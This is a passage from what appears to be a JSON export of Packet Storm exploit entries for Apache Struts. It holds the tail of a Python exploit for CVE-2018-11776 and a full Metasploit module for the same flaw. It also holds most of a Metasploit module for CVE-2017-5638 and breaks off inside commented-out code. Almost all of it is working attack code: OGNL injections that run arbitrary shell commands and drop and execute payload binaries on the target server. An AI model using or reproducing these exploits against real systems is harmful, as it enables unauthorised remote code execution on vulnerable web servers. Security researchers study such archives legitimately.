(sys.argv[0])) \nexit(0) \n \n \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \"--url\", \ndest=\"url\", \nhelp=\"Check a single URL.\", \naction='store') \nparser.add_argument(\"-l\", \"--list\", \ndest=\"usedlist\", \nhelp=\"Check a list of URLs.\", \naction='store') \nparser.add_argument(\"-c\", \"--cmd\", \ndest=\"cmd\", \nhelp=\"Command to execute. (Default: 'id')\", \naction='store', \ndefault='id') \nparser.add_argument(\"--exploit\", \ndest=\"do_exploit\", \nhelp=\"Exploit.\", \naction='store_true') \n \n \nargs = parser.parse_args() \nurl = args.url if args.url else None \nusedlist = args.usedlist if args.usedlist else None \ncmd = args.cmd if args.cmd else None \ndo_exploit = args.do_exploit if args.do_exploit else None \n \nheaders = { \n'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', \n# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', \n'Accept': '*/*' \n} \ntimeout = 3 \n \n \ndef parse_url(url): \n\"\"\" \nParses the URL. \n\"\"\" \n \n# url: http://example.com/demo/struts2-showcase/index.action \n \nurl = url.replace('#', '%23') \nurl = url.replace(' ', '%20') \n \nif ('://' not in url): \nurl = str(\"http://\") + str(url) \nscheme = urlparse.urlparse(url).scheme \n \n# Site: http://example.com \nsite = scheme + '://' + urlparse.urlparse(url).netloc \n \n# FilePath: /demo/struts2-showcase/index.action \nfile_path = urlparse.urlparse(url).path \nif (file_path == ''): \nfile_path = '/' \n \n# Filename: index.action \ntry: \nfilename = url.split('/')[-1] \nexcept IndexError: \nfilename = '' \n \n# File Dir: /demo/struts2-showcase/ \nfile_dir = file_path.rstrip(filename) \nif (file_dir == ''): \nfile_dir = '/' \n \nreturn({\"site\": site, \n\"file_dir\": file_dir, \n\"filename\": filename}) \n \n \ndef build_injection_inputs(url): \n\"\"\" \nBuilds injection inputs for the check. \n\"\"\" \n \nparsed_url = parse_url(url) \ninjection_inputs = [] \nurl_directories = parsed_url[\"file_dir\"].split(\"/\") \n \ntry: \nurl_directories.remove(\"\") \nexcept ValueError: \npass \n \nfor i in range(len(url_directories)): \ninjection_entry = \"/\".join(url_directories[:i]) \n \nif not injection_entry.startswith(\"/\"): \ninjection_entry = \"/%s\" % (injection_entry) \n \nif not injection_entry.endswith(\"/\"): \ninjection_entry = \"%s/\" % (injection_entry) \n \ninjection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload. \ninjection_entry += parsed_url[\"filename\"] \n \ninjection_inputs.append(injection_entry) \n \nreturn(injection_inputs) \n \n \ndef check(url): \nrandom_value = int(''.join(random.choice('0123456789') for i in range(2))) \nmultiplication_value = random_value * random_value \ninjection_points = build_injection_inputs(url) \nparsed_url = parse_url(url) \nprint(\"[%] Checking for CVE-2018-11776\") \nprint(\"[*] URL: %s\" % (url)) \nprint(\"[*] Total of Attempts: (%s)\" % (len(injection_points))) \nattempts_counter = 0 \n \nfor injection_point in injection_points: \nattempts_counter += 1 \nprint(\"[%s/%s]\" % (attempts_counter, len(injection_points))) \ntesting_url = \"%s%s\" % (parsed_url[\"site\"], injection_point) \ntesting_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value)) \ntry: \nresp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) \nexcept Exception as e: \nprint(\"EXCEPTION::::--> \" + str(e)) \ncontinue \nif \"Location\" in resp.headers.keys(): \nif str(multiplication_value) in resp.headers['Location']: \nprint(\"[*] Status: Vulnerable!\") \nreturn(injection_point) \nprint(\"[*] Status: Not Affected.\") \nreturn(None) \n \n \ndef exploit(url, cmd): \nparsed_url = parse_url(url) \n \ninjection_point = check(url) \nif injection_point is None: \nprint(\"[%] Target is not vulnerable.\") \nreturn(0) \nprint(\"[%] Exploiting...\") \n \npayload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd) \n \ntesting_url = \"%s%s\" % (parsed_url[\"site\"], injection_point) \ntesting_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload) \n \ntry: \nresp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) \nexcept Exception as e: \nprint(\"EXCEPTION::::--> \" + str(e)) \nreturn(1) \n \nprint(\"[%] Response:\") \nprint(resp.text) \nreturn(0) \n \n \ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): \nif url: \nif not do_exploit: \ncheck(url) \nelse: \nexploit(url, cmd) \n \nif usedlist: \nURLs_List = [] \ntry: \nf_file = open(str(usedlist), \"r\") \nURLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\") \ntry: \nURLs_List.remove(\"\") \nexcept ValueError: \npass \nf_file.close() \nexcept Exception as e: \nprint(\"Error: There was an error in reading list file.\") \nprint(\"Exception: \" + str(e)) \nexit(1) \nfor url in URLs_List: \nif not do_exploit: \ncheck(url) \nelse: \nexploit(url, cmd) \n \nprint(\"[%] Done.\") \n \n \nif __name__ == \"__main__\": \ntry: \nmain(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) \nexcept KeyboardInterrupt: \nprint(\"\\nKeyboardInterrupt Detected.\") \nprint(\"Exiting...\") \nexit(0) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149086/apachestruts2325-exec.txt"}, {"lastseen": "2018-09-08T18:08:24", "description": "", "cvss3": {}, "published": "2018-09-07T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-07T00:00:00", "id": "PACKETSTORM:149277", "href": "https://packetstormsecurity.com/files/149277/Apache-Struts-2-Namespace-Redirect-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \n# Eschewing CmdStager for now, since the use of '\\' and ';' are killing me \n#include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vulnerability in Apache Struts \nversion 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed \nvia an endpoint that makes use of a redirect action. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n#TODO: Is that second paragraph above still accurate? \n'Author' => [ \n'Man Yue Mo', # Discovery \n'hook-s3c', # PoC \n'asoto-r7', # Metasploit module \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2018-11776'], \n['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'], \n['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'], \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Automatic detection', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n[ \n'Windows', { \n'Platform' => %w{ windows }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n[ \n'Linux', { \n'Platform' => %w{ unix linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} \n}, \n], \n], \n'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018 \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), \nOptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]), \nOptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]), \nOptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ), \nOptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ), \n] \n) \nend \n \ndef check \n# METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable \nognl = \"#_memberAccess['allowStaticMethodAccess']\" \n \nresp = send_struts_request(ognl) \n \n# If vulnerable, the server should return an HTTP 302 (Redirect) \n# and the 'Location' header should contain either 'true' or 'false' \nif resp && resp.headers['Location'] \noutput = resp.headers['Location'] \nvprint_status(\"Redirected to: #{output}\") \nif (output.include? '/true/') \nprint_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\") \ndatastore['ENABLE_STATIC'] = false \nCheckCode::Vulnerable \nelsif (output.include? '/false/') \nprint_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\") \ndatastore['ENABLE_STATIC'] = true \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nelsif resp && resp.code==400 \n# METHOD 2: Generate two random numbers, ask the target to add them together. \n# If it does, it's vulnerable. \na = rand(10000) \nb = rand(10000) \nc = a+b \n \nognl = \"#{a}+#{b}\" \n \nresp = send_struts_request(ognl) \n \nif resp.headers['Location'].include? c.to_s \nvprint_status(\"Redirected to: #{resp.headers['Location']}\") \nprint_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\") \ndatastore['ENABLE_STATIC'] = false \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nend \nend \n \ndef exploit \ncase payload.arch.first \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload() \nend \nend \n \ndef encode_ognl(ognl) \n# Check and fail if the command contains the follow bad characters: \n# ';' seems to terminates the OGNL statement \n# '/' causes the target to return an HTTP/400 error \n# '\\' causes the target to return an HTTP/400 error (sometimes?) \n# '\\r' ends the GET request prematurely \n# '\\n' ends the GET request prematurely \n \n# TODO: Make sure the following line is uncommented \nbad_chars = %w[; \\\\ \\r \\n] # and maybe '/' \nbad_chars.each do |c| \nif ognl.include? c \nprint_error(\"Bad OGNL request: #{ognl}\") \nfail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\") \nend \nend \n \n# The following list of characters *must* be encoded or ORNL will asplode \nencodable_chars = { \"%\": \"%25\", # Always do this one first. :-) \n\" \": \"%20\", \n\"\\\"\":\"%22\", \n\"#\": \"%23\", \n\"'\": \"%27\", \n\"<\": \"%3c\", \n\">\": \"%3e\", \n\"?\": \"%3f\", \n\"^\": \"%5e\", \n\"`\": \"%60\", \n\"{\": \"%7b\", \n\"|\": \"%7c\", \n\"}\": \"%7d\", \n#\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal. \n#\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround? \n#\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround? \n#\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround? \n} \n \nencodable_chars.each do |k,v| \n#ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp) \nognl.gsub!(\"#{k}\",\"#{v}\") \nend \nreturn ognl \nend \n \ndef send_struts_request(ognl, payload: nil) \n=begin #badchar-checking code \npre = ognl \n=end \n \nognl = \"${#{ognl}}\" \nvprint_status(\"Submitted OGNL: #{ognl}\") \nognl = encode_ognl(ognl) \n \nheaders = {'Keep-Alive': 'timeout=5, max=1000'} \n \nif payload \nvprint_status(\"Embedding payload of #{payload.length} bytes\") \nheaders[datastore['HEADER']] = payload \nend \n \n# TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs \nuri = \"/#{ognl}/#{datastore['ACTION']}\" \n \nresp = send_request_cgi( \n#'encode' => true, # this fails to encode '\\', which is a problem for me \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\") \nend \n \n=begin #badchar-checking code \nprint_status(\"Response code: #{resp.code}\") \n#print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body \nif resp.headers['Location'] \nprint_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\") \nif resp.headers['Location'].split('/')[1] == pre[1..-2] \nprint_good(\"GOT 'EM!\") \nelse \nprint_error(\" #{pre[1..-2]}\") \nend \nend \n=end \n \nresp \nend \n \ndef profile_target \n# Use OGNL to extract properties from the Java environment \n \nproperties = { 'os.name': nil, # e.g. 'Linux' \n'os.arch': nil, # e.g. 'amd64' \n'os.version': nil, # e.g. '4.4.0-112-generic' \n'user.name': nil, # e.g. 'root' \n#'user.home': nil, # e.g. '/root' (didn't work in testing) \n'user.language': nil, # e.g. 'en' \n#'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing) \n} \n \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|('#{rand_text_alpha(2)}')| \nproperties.each do |k,v| \nognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'| \nend \nognl = ognl[0...-4] \n \nr = send_struts_request(ognl) \n \nif r.code == 400 \nfail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\") \nelsif r.headers['Location'] \n# r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action' \n# Extract the OGNL output from the Location path, and strip the two random chars \ns = r.headers['Location'].split('/')[1][2..-1] \n \nif s.nil? \n# Since the target didn't respond with an HTTP/400, we know the OGNL code executed. \n# But we didn't get any output, so we can't profile the target. Abort. \nreturn nil \nend \n \n# Confirm that all fields were returned, and non include extra (:) delimiters \n# If the OGNL fails, we might get a partial result back, in which case, we'll abort. \nif s.count(':') > properties.length \nprint_error(\"Failed to profile target. Response from server: #{r.to_s}\") \nfail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\") \nend \n \n# Separate the colon-delimited properties and store in the 'properties' hash \ns = s.split(':') \ni = 0 \nproperties.each do |k,v| \nproperties[k] = s[i] \ni += 1 \nend \n \nprint_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" + \n\" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\") \nreturn properties \nelse \nprint_error(\"Failed to profile target. Response from server: #{r.to_s}\") \nfail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\") \nend \nend \n \ndef execute_command(cmd_input, opts={}) \n# Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that. \nif cmd_input.include? ';' \nprint_warning(\"WARNING: Command contains bad characters: semicolons (;).\") \nend \n \nbegin \nproperties = profile_target \nos = properties[:'os.name'].downcase \nrescue \nvprint_warning(\"Target profiling was unable to determine operating system\") \nos = '' \nos = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' \nos = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' \nos = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' \nend \n \nif (os.include? 'linux') || (os.include? 'nix') \ncmd = \"{'sh','-c','#{cmd_input}'}\" \nelsif os.include? 'win' \ncmd = \"{'cmd.exe','/c','#{cmd_input}'}\" \nelse \nvprint_error(\"Failed to detect target OS. Attempting to execute command directly\") \ncmd = cmd_input \nend \n \n# The following OGNL will run arbitrary commands on Windows and Linux \n# targets, as well as returning STDOUT and STDERR. In my testing, \n# on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds. \n \nvprint_status(\"Executing: #{cmd}\") \n \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start()).| \nognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).| \nognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).| \nognl << %q|(#r.flush())| \n \nr = send_struts_request(ognl) \n \nif r && r.code == 200 \nprint_good(\"Command executed:\\n#{r.body}\") \nelsif r \nif r.body.length == 0 \nprint_status(\"Payload sent, but no output provided from server.\") \nelsif r.body.length > 0 \nprint_error(\"Failed to run command. Response from server: #{r.to_s}\") \nend \nend \nend \n \ndef send_payload \n# Probe for the target OS and architecture \nbegin \nproperties = profile_target \nos = properties[:'os.name'].downcase \nrescue \nvprint_warning(\"Target profiling was unable to determine operating system\") \nos = '' \nos = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' \nos = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' \nos = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' \nend \n \ndata_header = datastore['HEADER'] \nif data_header.empty? \nfail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\") \nend \n \nrandom_filename = datastore['TEMPFILE'] \n \n# d = data stream from HTTP header \n# f = path to temp file \n# s = stream/handle to temp file \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#s=new java.io.FileOutputStream(#f)).| \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).| \nognl << %q|(#s.write(#d)).| \nognl << %q|(#s.close()).| \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete()).| \n \nsuccess_string = rand_text_alpha(4) \nognl << %Q|('#{success_string}')| \n \nexe = [generate_payload_exe].pack(\"m\").delete(\"\\n\") \nr = send_struts_request(ognl, payload: exe) \n \nif r && r.headers && r.headers['Location'].split('/')[1] == success_string \nprint_good(\"Payload successfully dropped and executed.\") \nelsif r && r.headers['Location'] \nvprint_error(\"RESPONSE: \" + r.headers['Location']) \nfail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\") \nelsif r && r.code == 400 \nfail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149277/struts2_namespace_ognl.rb.txt"}, {"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << \"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new 